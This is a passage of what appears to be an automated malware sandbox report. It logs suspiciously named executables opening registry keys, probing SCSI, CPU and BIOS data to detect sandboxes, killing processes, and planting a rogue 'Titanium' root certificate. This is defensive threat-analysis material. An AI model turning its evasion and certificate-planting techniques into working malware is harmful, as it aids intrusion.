\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cudo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language up.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language maza-0.16.3-win64-setup-unsigned.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language computerlead.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vg9qcBa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VBVEd6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bypass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 17b5adcd83.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language legas.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HKZINHMZHBGY0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nguyentri38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vg9qcBa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MePaxil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a077d9ad88.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScanGuard.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 367219602.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hashed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32b1c3a712.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kiyan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Set_up.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x000400000001cdb9-748.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VBVEd6f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString random.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VBVEd6f.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 hashed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString hashed.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2784 timeout.exe 344 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 3828 taskkill.exe 3224 taskkill.exe 1560 taskkill.exe 2764 taskkill.exe 3176 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\maza\URL Protocol maza-0.16.3-win64-setup-unsigned.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\maza\ = "URL:Maza" maza-0.16.3-win64-setup-unsigned.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\maza\DefaultIcon maza-0.16.3-win64-setup-unsigned.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\maza\DefaultIcon\ = "C:\\Program Files\\Maza\\maza-qt.exe" maza-0.16.3-win64-setup-unsigned.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\maza\shell\open\command maza-0.16.3-win64-setup-unsigned.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\maza maza-0.16.3-win64-setup-unsigned.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\maza\shell maza-0.16.3-win64-setup-unsigned.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\maza\shell\open maza-0.16.3-win64-setup-unsigned.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\maza\shell\open\command\ = "\"C:\\Program Files\\Maza\\maza-qt.exe\" \"%1\"" maza-0.16.3-win64-setup-unsigned.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 kiyan.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 kiyan.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 vg9qcBa.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 